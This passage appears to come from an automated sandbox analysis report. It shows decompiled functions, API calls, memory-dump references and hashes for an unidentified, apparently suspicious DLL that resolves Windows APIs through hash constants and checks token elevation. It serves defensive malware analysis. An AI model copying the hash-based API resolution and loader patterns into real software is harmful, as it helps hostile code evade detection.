Instruction Fuzzy Hash: F4F04931E0CB1279DB5559B8AD40AC773E9DFD1750F184B3DF640AA164E760844886A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E71564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E71564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E713064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E70E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e715656
0x6e715658
0x6e71565f
0x6e715661
0x6e715665
0x6e715667
0x6e71566a
0x6e71566d
0x6e71566d
0x6e715687
0x00000000
0x00000000
0x6e715698
0x6e71569c
0x00000000
0x00000000
0x6e7156aa
0x6e7156ad
0x6e7156b2
0x6e7156b7
0x6e7156b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E715698

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: b7e2f0dc80210f82636b998a1600e935c19d14a9ae2c72ff6a881e6715d34b11
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 46F0A4B520430AABE7249E5A9D54DF7BBFDDBD1B50F04852DA0D542110EA31A85089B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E711030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E711030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E71306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e71103e
0x6e711040
0x6e71104e
0x6e711052
0x6e71109b
0x00000000
0x6e71109b
0x6e711057
0x6e711058
0x6e71105a
0x6e71105f
0x00000000
0x6e711078
0x6e71107c
0x6e711089
0x6e71108d
0x00000000
0x00000000
0x00000000
0x6e711096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E711089

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 57efcd1a3a1c8890b08462f09a29761a5d0fe971c0954111d57bfe4315ebc5ff
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: D7F0C870748B47ABFB4095B8AE28FBF32ED5BC1610F84883CB544CE1A4DF34C8098621

Uniqueness

Uniqueness Score: -1.00%

Function 6E713628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E713628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e71d228 == 0xa33c83e5) {
					_t7 = E6E713064(0x60a28c5c, 0x1c6ef387);
					 *0x6e71d22c = E6E713064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e71d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e71d228 = 0;
					}
				}
				_t3 = E6E713064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e71d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e713630
0x6e713638
0x6e71366b
0x6e71367c
0x6e713687
0x6e713692
0x6e713694
0x6e713694
0x6e713687
0x6e713644
0x6e71364b
0x00000000
0x6e71364d
0x6e71364d
0x6e71364e
0x6e713650
0x6e713652
0x6e713653
0x00000000
0x6e713653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E70DE09,?,?), ref: 6E713692

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 13453a1982d082c85f4a00964b7cba767bf4953c095741747fcde12f4fa1411a
Instruction ID: 6bd67b2922796aa633045bf3f4682d7638e6ab47b5cf80f44cf0d678293a020c
Opcode Fuzzy Hash: 13453a1982d082c85f4a00964b7cba767bf4953c095741747fcde12f4fa1411a
Instruction Fuzzy Hash: 84F0597021E380BDEB600DE6BD0CCD696E9EF502D6F0F0C39F284B1128D6B48840CA36

Uniqueness

Uniqueness Score: -1.00%

Function 00A41000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00A410FF

Memory Dump Source

Source File: 00000000.00000002.1057781343.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 06d8ff3f6ed8c7c8712051fd79dfb516bbe365c1efc66768bfa8667bde276660
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: E441E5B5E052198FDB04DFA8C5946AEBBF0FF88314F19856DE448AB340D375A881CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E701494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E701494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E70F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v76, E6E70F4CC( &_v76) + 0x10);
				E6E70F4BC( &_v80, E6E70F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v84, E6E70F4CC(_t325) + 0x10);
				E6E70F4BC( &_v88, E6E70F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v92, E6E70F4CC(_t329) + 0x10);
				E6E70F4BC( &_v96, E6E70F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v100, E6E70F4CC(_t333) + 0x10);
				E6E70F4BC( &_v104, E6E70F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v108, E6E70F4CC(_t337) + 0x10);
				E6E70F4BC( &_v112, E6E70F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v116, E6E70F4CC(_t341) + 0x10);
				E6E70F4BC( &_v120, E6E70F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v124, E6E70F4CC(_t345) + 0x10);
				E6E70F4BC( &_v128, E6E70F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v132, E6E70F4CC(_t349) + 0x10);
				E6E70F4BC( &_v136, E6E70F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v140, E6E70F4CC(_t353) + 0x10);
				E6E70F4BC( &_v144, E6E70F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v148, E6E70F4CC(_t357) + 0x10);
				E6E70F4BC( &_v152, E6E70F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v156, E6E70F4CC(_t361) + 0x10);
				E6E70F4BC( &_v160, E6E70F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v164, E6E70F4CC(_t365) + 0x10);
				E6E70F4BC( &_v168, E6E70F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v172, E6E70F4CC(_t369) + 0x10);
				E6E70F4BC( &_v176, E6E70F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v180, E6E70F4CC(_t373) + 0x10);
				E6E70F4BC( &_v184, E6E70F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v188, E6E70F4CC(_t377) + 0x10);
				E6E70F4BC( &_v192, E6E70F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v196, E6E70F4CC(_t381) + 0x10);
				E6E70F4BC( &_v200, E6E70F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v204, E6E70F4CC(_t385) + 0x10);
				E6E70F4BC( &_v208, E6E70F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E714200(0x60a28c5c, _t434);
				E6E70F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E70F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E70F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E70F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E70F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E70F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E70F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E70F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E70F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E70F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E70F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E70F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E70F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E70F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E70F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E70F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E70F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E701D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E70B27C( &_v248, _v256, _t481, _v252, _t318);
				E6E70F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v296, E6E70F4CC(_t410) + 0x10);
				E6E70F4BC( &_v300, E6E70F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v304, E6E70F4CC(_t414) + 0x10);
				E6E70F4BC( &_v308, E6E70F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v312, E6E70F4CC(_t418) + 0x10);
				E6E70F4BC( &_v316, E6E70F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E70F828( &_v320, E6E70F4CC(_t422) + 0x10);
				E6E70F4BC( &_v324, E6E70F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E70B9FC(_t154,  *_t480);
				E6E70F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E70F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E70F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E70F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E70F654( &_v316);
				return E6E70F654( &_v356);
			}

0x6e701494
0x6e701498
0x6e70149d
0x6e7014a3
0x6e7014ab
0x6e7014b0
0x6e7014bc
0x6e7014c0
0x6e7014d2
0x6e7014e8
0x6e7014f3
0x6e7014f4
0x6e7014f5
0x6e7014f6
0x6e7014f7
0x6e7014fa
0x6e7014fe
0x6e701502
0x6e701509
0x6e70151b
0x6e701531
0x6e70153c
0x6e70153d
0x6e70153e
0x6e70153f
0x6e701540
0x6e701543
0x6e701547
0x6e70154b
0x6e701552
0x6e701564
0x6e70157a
0x6e701585
0x6e701586
0x6e701587
0x6e701588
0x6e701589
0x6e70158c
0x6e701590
0x6e701594
0x6e70159b
0x6e7015ad
0x6e7015c3
0x6e7015ce
0x6e7015cf
0x6e7015d0
0x6e7015d1
0x6e7015d2
0x6e7015d5
0x6e7015d9
0x6e7015dd
0x6e7015e4
0x6e7015f6
0x6e70160c
0x6e701617
0x6e701618
0x6e701619
0x6e70161a
0x6e70161b
0x6e70161e
0x6e701622
0x6e701626
0x6e70162d
0x6e70163f
0x6e701655
0x6e701660
0x6e701661
0x6e701662
0x6e701663
0x6e701664
0x6e701667
0x6e70166b
0x6e70166f
0x6e701676
0x6e701688
0x6e70169e
0x6e7016a9
0x6e7016aa
0x6e7016ab
0x6e7016ac
0x6e7016ad
0x6e7016b0
0x6e7016b4
0x6e7016b8
0x6e7016bf
0x6e7016d1
0x6e7016e7
0x6e7016f2
0x6e7016f3
0x6e7016f4
0x6e7016f5
0x6e7016f6
0x6e7016f9
0x6e7016fd
0x6e701701
0x6e701708
0x6e70171a
0x6e701730
0x6e70173b
0x6e70173c
0x6e70173d
0x6e70173e
0x6e70173f
0x6e701742
0x6e701746
0x6e70174a
0x6e701751
0x6e701763
0x6e701779
0x6e701784
0x6e701785
0x6e701786
0x6e701787
0x6e701788
0x6e70178b
0x6e70178f
0x6e701793
0x6e70179a
0x6e7017ac
0x6e7017c2
0x6e7017cd
0x6e7017ce
0x6e7017cf
0x6e7017d0
0x6e7017d1
0x6e7017d4
0x6e7017d8
0x6e7017dc
0x6e7017e3
0x6e7017f5
0x6e70180b
0x6e701816
0x6e701817
0x6e701818
0x6e701819
0x6e70181a
0x6e70181d
0x6e701821
0x6e701825
0x6e70182c
0x6e70183e
0x6e701854
0x6e70185f
0x6e701860
0x6e701861
0x6e701862
0x6e701863
0x6e701866
0x6e70186a
0x6e70186e
0x6e701875
0x6e701887
0x6e70189d
0x6e7018a8
0x6e7018a9
0x6e7018aa
0x6e7018ab
0x6e7018ac
0x6e7018af
0x6e7018b3
0x6e7018b7
0x6e7018be
0x6e7018d0
0x6e7018e6
0x6e7018f1
0x6e7018f2
0x6e7018f3
0x6e7018f4
0x6e7018f5
0x6e7018f8
0x6e7018fc
0x6e701900
0x6e701907
0x6e701919
0x6e70192f
0x6e70193a
0x6e70193b
0x6e70193c
0x6e70193d
0x6e70193e
0x6e701941
0x6e701945
0x6e701949
0x6e701950
0x6e701962
0x6e701978
0x6e701983
0x6e701984
0x6e701985
0x6e701986
0x6e70198c
0x6e70198f
0x6e701991
0x6e70199c
0x6e7019a3
0x6e7019ac
0x6e7019b4
0x6e7019bb
0x6e7019c4
0x6e7019cc
0x6e7019d3
0x6e7019dc
0x6e7019e4
0x6e7019eb
0x6e7019f4
0x6e7019fc
0x6e701a03
0x6e701a0c
0x6e701a14
0x6e701a1b
0x6e701a24
0x6e701a2c
0x6e701a36
0x6e701a3f
0x6e701a47
0x6e701a51
0x6e701a5a
0x6e701a62
0x6e701a6c
0x6e701a75
0x6e701a7d
0x6e701a87
0x6e701a90
0x6e701a98
0x6e701aa2
0x6e701aab
0x6e701ab3
0x6e701abd
0x6e701ac6
0x6e701ace
0x6e701ad8
0x6e701ae1
0x6e701ae9
0x6e701af3
0x6e701afc
0x6e701b04
0x6e701b0e
0x6e701b17
0x6e701b1f
0x6e701b26
0x6e701b2f
0x6e701b37
0x6e701b3e
0x6e701b43
0x6e701b51
0x6e701b55
0x6e701b64
0x6e701b6d
0x6e701b72
0x6e701b79
0x6e701b7d
0x6e701b81
0x6e701b88
0x6e701b9a
0x6e701bb0
0x6e701bbb
0x6e701bbc
0x6e701bbd
0x6e701bbe
0x6e701bbf
0x6e701bc2
0x6e701bc6
0x6e701bca
0x6e701bd1
0x6e701be3
0x6e701bf9
0x6e701c04
0x6e701c05
0x6e701c06
0x6e701c07
0x6e701c08
0x6e701c0b
0x6e701c0f
0x6e701c13
0x6e701c1a
0x6e701c2c
0x6e701c42
0x6e701c4d
0x6e701c4e
0x6e701c4f
0x6e701c50
0x6e701c51
0x6e701c54
0x6e701c58
0x6e701c5c
0x6e701c63
0x6e701c75
0x6e701c8b
0x6e701c96
0x6e701c97
0x6e701c98
0x6e701c99
0x6e701c9a
0x6e701c9d
0x6e701ca0
0x6e701ca1
0x6e701ca2
0x6e701ca9
0x6e701cac
0x6e701cb7
0x6e701cbe
0x6e701cc7
0x6e701ccf
0x6e701cd6
0x6e701cdf
0x6e701ce7
0x6e701cee
0x6e701cf7
0x6e701cff
0x6e701d04
0x6e701d0d
0x6e701d15
0x6e701d2a

Strings

8nsK, xrefs: 6E701900

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: cc78bdde719371af7ce44d7da393f5269fef9dd3afccd3479dc2170de307d558
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: BE32E6B24047069AC719DF60CD909EF77E4AFA1218F204F0DB9895A1B2FF71E987C685

Uniqueness

Uniqueness Score: -1.00%

Function 6E70A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E70A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E70B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E70F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E70F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E712234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E70F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
